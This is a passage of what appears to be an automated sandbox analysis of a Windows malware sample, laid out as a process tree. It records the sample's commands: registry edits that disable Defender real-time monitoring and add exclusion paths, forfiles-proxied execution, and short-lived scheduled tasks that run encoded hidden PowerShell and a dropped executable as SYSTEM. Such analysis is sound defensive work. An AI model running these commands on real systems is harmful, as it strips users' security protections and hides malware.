                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                            5⤵
                                                                                                                                              PID:2928
                                                                                                                                              • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                                                                                6⤵
                                                                                                                                                  PID:3240
                                                                                                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                                                                              4⤵
                                                                                                                                              • Indirect Command Execution
                                                                                                                                              PID:3324
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                5⤵
                                                                                                                                                  PID:3332
                                                                                                                                                  • \??\c:\windows\SysWOW64\reg.exe
                                                                                                                                                    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                                                    6⤵
                                                                                                                                                      PID:2128
                                                                                                                                                • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                  forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                                                  4⤵
                                                                                                                                                  • Indirect Command Execution
                                                                                                                                                  PID:2844
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                    5⤵
                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                    PID:1064
                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                                      6⤵
                                                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                                                      • Drops file in System32 directory
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:3596
                                                                                                                                                      • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                                        "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                                        7⤵
                                                                                                                                                          PID:3908
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /CREATE /TN "gAQuuQjav" /SC once /ST 00:57:41 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                  3⤵
                                                                                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                                                                                  PID:3200
                                                                                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                  schtasks /run /I /tn "gAQuuQjav"
                                                                                                                                                  3⤵
                                                                                                                                                    PID:1528
                                                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                    schtasks /DELETE /F /TN "gAQuuQjav"
                                                                                                                                                    3⤵
                                                                                                                                                      PID:1492
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                      PID:916
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                                                                                                                        4⤵
                                                                                                                                                        • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                        PID:3824
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                                                                                      3⤵
                                                                                                                                                        PID:3380
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                                                                                                                          4⤵
                                                                                                                                                          • Modifies Windows Defender Real-time Protection settings
                                                                                                                                                          PID:3360
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /CREATE /TN "gFvOMFvNc" /SC once /ST 01:55:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                        3⤵
                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                        PID:2588
                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                        schtasks /run /I /tn "gFvOMFvNc"
                                                                                                                                                        3⤵
                                                                                                                                                          PID:1852
                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                          schtasks /DELETE /F /TN "gFvOMFvNc"
                                                                                                                                                          3⤵
                                                                                                                                                            PID:3892
                                                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                                            "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                                                                                                                            3⤵
                                                                                                                                                            • Indirect Command Execution
                                                                                                                                                            PID:1668
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                                              4⤵
                                                                                                                                                                PID:3204
                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:3472
                                                                                                                                                                  • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                                                    "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                    PID:3316
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              3⤵
                                                                                                                                                                PID:3120
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Windows security bypass
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:3152
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                3⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:2624
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                  4⤵
                                                                                                                                                                  • Windows security bypass
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  PID:3188
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                3⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                PID:1372
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:1388
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:1700
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                      4⤵
                                                                                                                                                                        PID:1228
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      cmd /C copy nul "C:\Windows\Temp\HIoTiJfsoGzpkHVf\nhhxtYyg\czsjwLcKkpZfrfLa.wsf"
                                                                                                                                                                      3⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      PID:2904
                                                                                                                                                                    • C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                      wscript "C:\Windows\Temp\HIoTiJfsoGzpkHVf\nhhxtYyg\czsjwLcKkpZfrfLa.wsf"
                                                                                                                                                                      3⤵
                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                                                      PID:3376
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Windows security bypass
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:3444
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Windows security bypass
                                                                                                                                                                        PID:1676
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Windows security bypass
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:2828
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Windows security bypass
                                                                                                                                                                        PID:3064
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Windows security bypass
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:2588
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Windows security bypass
                                                                                                                                                                        PID:2180
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Windows security bypass
                                                                                                                                                                        PID:2324
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Windows security bypass
                                                                                                                                                                        PID:1708
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Windows security bypass
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:1088
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Windows security bypass
                                                                                                                                                                        PID:2320
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Windows security bypass
                                                                                                                                                                        PID:1448
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Windows security bypass
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:580
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Windows security bypass
                                                                                                                                                                        PID:3304
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Windows security bypass
                                                                                                                                                                        PID:1592
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Windows security bypass
                                                                                                                                                                        PID:1012
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Windows security bypass
                                                                                                                                                                        PID:2520
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Windows security bypass
                                                                                                                                                                        PID:932
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                        4⤵
                                                                                                                                                                        • Windows security bypass
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:2156
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        4⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:3056
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BRWHUqYPU" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                        4⤵
                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                        PID:3928
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        4⤵
                                                                                                                                                                          PID:3332
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\DsJnIJMlqPUn" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:3892
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                            4⤵
                                                                                                                                                                              PID:2112
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\GqgEBhsSxktU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                              4⤵
                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                              PID:2100
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                              4⤵
                                                                                                                                                                                PID:3112
                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJMRwiGdhyaHC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                4⤵
                                                                                                                                                                                  PID:3880
                                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                  "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                  4⤵
                                                                                                                                                                                    PID:1552
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\efiAzqQKrQpqActHLvR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                    4⤵
                                                                                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                                                                                    PID:3152
                                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                    4⤵
                                                                                                                                                                                      PID:2500
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\PdOICyyFbClqQxVB" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:2984
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:3344
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                      4⤵
                                                                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                                                                      PID:3824
                                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                      "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:3300
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\dHKolINgIhAdcWITI" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                                                                        PID:3444
                                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                                        4⤵
                                                                                                                                                                                          PID:3384
                                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                          "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HIoTiJfsoGzpkHVf" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                                          4⤵
                                                                                                                                                                                            PID:2684
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /CREATE /TN "gTkYDpEUi" /SC once /ST 20:21:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                          PID:3092
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /run /I /tn "gTkYDpEUi"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                                                          PID:3504
                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                          schtasks /DELETE /F /TN "gTkYDpEUi"
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:3696
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                                                            PID:3928
                                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
                                                                                                                                                                                              4⤵
                                                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                                                              PID:3332
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:3916
                                                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                                                REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
                                                                                                                                                                                                4⤵
                                                                                                                                                                                                  PID:3892
                                                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                schtasks /CREATE /TN "unWjgiOqmrJvCJdsa" /SC once /ST 01:24:37 /RU "SYSTEM" /TR "\"C:\Windows\Temp\HIoTiJfsoGzpkHVf\BoBXyALzskGUfla\OlHGHzZ.exe\" 9Z /YXKfdidWN 385121 /S" /V1 /F
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Drops file in Windows directory
